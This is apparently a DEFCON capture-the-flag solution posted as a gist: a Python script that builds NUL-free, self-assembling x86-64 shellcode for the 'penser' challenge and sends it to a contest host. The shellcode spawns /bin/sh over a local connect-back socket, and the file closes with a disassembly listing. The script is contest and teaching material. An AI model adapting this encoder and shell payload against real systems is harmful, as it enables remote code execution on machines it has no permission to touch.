@potetisensei
Created February 19, 2014 07:04
DEFCON Writeup penser
from socket import *
from commands import getoutput
from struct import pack
# Accumulator for the final byte string; the pieces built further down are
# appended to it at the end of the file.
payload = ""

# Stage-2 machine code (x86-64: the listing at the bottom of the file uses
# rsi/rbp/rdi).  The body loop below consumes it one byte at a time, so the
# literal is kept byte for byte.
shellcode = 'H1\xd2H1\xc0\xb2\x02H\x89\xd7\xb2\x01H\x89\xd6\xb2\x06\xb0)\x0f\x05H\x89\xc7H1\xc0P\xbb\x80\x01\x01\x02\x81\xeb\x01\x01\x01\x01H\xc1\xe3 f\xb8\x11\\\xc1\xe0\x10\xb0\x02H\t\xd8PH\x89\xe6H1\xd2\xb2\x10H1\xc0\xb0*\x0f\x05H1\xf6H1\xc0\xb0!\x0f\x05H1\xc0\xb0!H\xff\xc6\x0f\x05H1\xc0\xb0!H\xff\xc6\x0f\x05H1\xf6H1\xd2RH\xbf//bin/shWH\x89\xe7H1\xc0\xb0;\x0f\x05'

# Filler sequences interleaved between the meaningful instructions of the
# blocks built below (the author calls them "nops"; the trailing comment is
# the instruction each decodes to).  Their NUL bytes are removed before the
# payload is sent, see the end of the file.
zero_nop = "\x00\x66\x00"          # add [rsi+0x0],ah
another_zero_nop = "\x00\x42\x00"  # add [rdx+0x0],al
nop = "\x25\x00\x0A\x00\x0A"       # and eax,0xa000a00
# Register shuffle that precedes the encoded data.  The listing at the bottom
# of the file gives the instruction for every non-filler byte; note that the
# listing leaves out the zero_nop / another_zero_nop / nop filler that is
# interleaved here.
_header_parts = [
    "\x56",             # push rsi
    another_zero_nop,
    "\x5B",             # pop rbx
    another_zero_nop,
    "\x52",             # push rdx
    "\x00\x42\x00",     # add [rdx+0x0],al
    "\x5E",             # pop rsi
    zero_nop,
    "\x53",             # push rbx
    zero_nop,
    "\x54",             # push rsp
    zero_nop,
    "\x5D",             # pop rbp
    "\x00\x5D\x00",     # add [rbp+0x0],bl  (three times, nop in between)
    nop,
    "\x00\x5D\x00",
    nop,
    "\x00\x5D\x00",
    "\x59",             # pop rcx
    zero_nop,
    "\x51",             # push rcx
    zero_nop,
    "\x54",             # push rsp
    zero_nop,
    "\x5D",             # pop rbp
    "\x00\x4D\x00",     # add [rbp+0x0],cl  (three times, nop in between)
    nop,
    "\x00\x4D\x00",
    nop,
    "\x00\x4D\x00",
    "\x5A",             # pop rdx
    zero_nop,
    "\x52",             # push rdx
    zero_nop,
    "\x54",             # push rsp
    zero_nop,
    "\x5D",             # pop rbp
    "\x00\x55\x00",     # add [rbp+0x0],dl  (three times, nop in between)
    nop,
    "\x00\x55\x00",
    nop,
    "\x00\x55\x00",
    "\x5F",             # pop rdi
    zero_nop,
]
header = "".join(_header_parts)
# Prologue of the first length-dependent block (instructions per the listing
# at the end of the file; filler interleaved).
offset1_header = "".join([
    "\x56", zero_nop,          # push rsi
    "\x54", zero_nop,          # push rsp
    "\x54", zero_nop,          # push rsp
    "\x5d", "\x00\x5d\x00",    # pop rbp ; add [rbp+0x0],bl
    "\x5d", zero_nop,          # pop rbp
])
# One 4-byte rbp-relative store per base-4 digit weight: the encoding loop
# further down emits entry i once per unit of weight 4**i.
offset1_dic = ["\x48\x00\x5D\x00", "\x48\x00\x4D\x00", "\x48\x00\x55\x00", "\x48\x00\x7D\x00"]
# Epilogue: pop rsi, then filler.
offset1_footer = "\x5e" + zero_nop
# Prologue of the second length-dependent block.
offset2_header = "".join([
    "\x56", zero_nop,    # push rsi
    "\x54", zero_nop,    # push rsp
    "\x5d", zero_nop,    # pop rbp
])
# Same rbp-relative digit-store table as offset1_dic.
offset2_dic = ["\x48\x00\x5D\x00", "\x48\x00\x4D\x00", "\x48\x00\x55\x00", "\x48\x00\x7D\x00"]
# Epilogue: pop rsi, then filler (byte-identical to offset1_footer).
offset2_footer = "\x5e" + zero_nop
# rsi-relative stores used by the body loop, one per base-4 digit weight.
store_dic = ["\x40\x00\x5E\x00", "\x40\x00\x4E\x00", "\x40\x00\x56\x00", "\x40\x00\x7E\x00"]
# Emitted after every encoded shellcode byte: push rsi / push rsp / pop rbp /
# add [rbp+0x0],bl / pop rsi (see the listing at the end of the file).
increment = "".join([
    "\x56", zero_nop,
    "\x54", zero_nop,
    "\x5d", "\x00\x5d\x00",
    "\x5e", zero_nop,
])
# Last two instructions of the payload: push rbp / pop rax, filler between.
footer = "\x55" + zero_nop + "\x58"
# Encode the shellcode one byte at a time.  Each byte value is split into
# four base-4 digits, most significant first; digit k (weight 4**k) becomes
# that many copies of store_dic[k], and every byte is followed by the
# `increment` sequence.
_body_parts = []
for ch in shellcode:
    num = ord(ch)
    for j in reversed(range(4)):
        times, num = divmod(num, 4 ** j)
        _body_parts.append(store_dic[j] * times)
    _body_parts.append(increment)
body = "".join(_body_parts)
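# First length-dependent block: the quotient of the running length by 0x100
# (its high byte, for lengths below 0x10000) encoded with offset1_dic as
# base-4 digits, most significant first.
# NOTE(review): the +48 adjustment is not derivable from this file — confirm
# against the rest of the writeup before changing the layout.
num = (len(header) + len(body) + len(offset1_header) + len(offset1_footer)
       + len(offset2_header) + len(offset2_footer) + len(footer) + 48)
# Floor division, not `/=`: under Python 3 (or `from __future__ import
# division`) `/=` yields a float and the string repetition below raises
# TypeError.  For Python 2 ints the result is unchanged.
num //= 0x100
_offset1_digits = []
for i in reversed(range(4)):
    times, num = divmod(num, 4 ** i)
    _offset1_digits.append(offset1_dic[i] * times)
offset1 = offset1_header + "".join(_offset1_digits) + offset1_footer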
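# Second length-dependent block: the running length modulo 0x100 (its low
# byte) encoded with offset2_dic as base-4 digits, most significant first.
# NOTE(review): the +36 adjustment is not derivable from this file — confirm
# against the rest of the writeup before changing the layout.
num = (len(header) + len(body) + len(offset1) + len(offset2_header)
       + len(offset2_footer) + len(footer) + 36)
num %= 0x100
_offset2_digits = []
for i in reversed(range(4)):
    times, num = divmod(num, 4 ** i)
    _offset2_digits.append(offset2_dic[i] * times)
# The original appended offset1_footer here; offset2_footer is the same
# bytes and is the one the length computation above accounts for, so this
# keeps the block self-consistent without changing the output.
offset2 = offset2_header + "".join(_offset2_digits) + offset2_footer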
# Final layout: header, the two length-dependent blocks, the encoded
# shellcode, then the footer.
payload += "".join([header, offset1, offset2, body, footer])
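# Keep a copy of the full payload (NUL bytes included) for inspection.
# `with` closes the handle; the original left the file object to the GC.
with open("check", "wb") as dump:
    dump.write(payload)
# Only the non-NUL bytes travel over the wire, preceded by their count as a
# little-endian 32-bit integer.
sendee = payload.replace("\x00", "")
t = socket(AF_INET, SOCK_STREAM)
try:
    t.connect(("192.168.174.187", 8273))
    t.sendall(pack("<I", len(sendee)))
    t.sendall(sendee)
finally:
    # Close explicitly instead of relying on interpreter exit.
    t.close()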
# Reference disassembly of the building blocks defined above.  The header
# listing shows only the non-filler instructions; the zero_nop /
# another_zero_nop / nop sequences interleaved in the code are omitted.
"""
header:
00000000 56 push rsi
00000001 5B pop rbx
00000002 52 push rdx
00000003 004200 add [rdx+0x0],al
00000006 5E pop rsi
00000007 53 push rbx
00000008 54 push rsp
00000009 5D pop rbp
0000000A 005D00 add [rbp+0x0],bl
0000000D 005D00 add [rbp+0x0],bl
00000010 005D00 add [rbp+0x0],bl
00000013 59 pop rcx
00000014 51 push rcx
00000015 54 push rsp
00000016 5D pop rbp
00000017 004D00 add [rbp+0x0],cl
0000001A 004D00 add [rbp+0x0],cl
0000001D 004D00 add [rbp+0x0],cl
00000020 5A pop rdx
00000021 52 push rdx
00000022 54 push rsp
00000023 5D pop rbp
00000024 005500 add [rbp+0x0],dl
00000027 005500 add [rbp+0x0],dl
0000002A 005500 add [rbp+0x0],dl
0000002D 5F pop rdi
offset1_header:
00000000 56 push rsi
00000001 54 push rsp
00000002 54 push rsp
00000003 5D pop rbp
00000004 005D00 add [rbp+0x0],bl
00000007 5D pop rbp
offset1_dic:
00000000 48005D00 o64 add [rbp+0x0],bl
00000000 48004D00 o64 add [rbp+0x0],cl
00000000 48005500 o64 add [rbp+0x0],dl
00000000 48007D00 o64 add [rbp+0x0],dil
offset1_footer:
00000000 5E pop rsi
offset2_header:
00000000 56 push rsi
00000001 54 push rsp
00000002 5D pop rbp
offset2_footer:
00000000 5E pop rsi
store_dic:
00000000 40005E00 add [rsi+0x0],bl
00000000 40004E00 add [rsi+0x0],cl
00000000 40005600 add [rsi+0x0],dl
00000000 40007E00 add [rsi+0x0],dil
increment:
00000000 56 push rsi
00000001 54 push rsp
00000002 5D pop rbp
00000003 005D00 add [rbp+0x0],bl
00000006 5E pop rsi
footer:
00000000 55 push rbp
00000001 58 pop rax
"""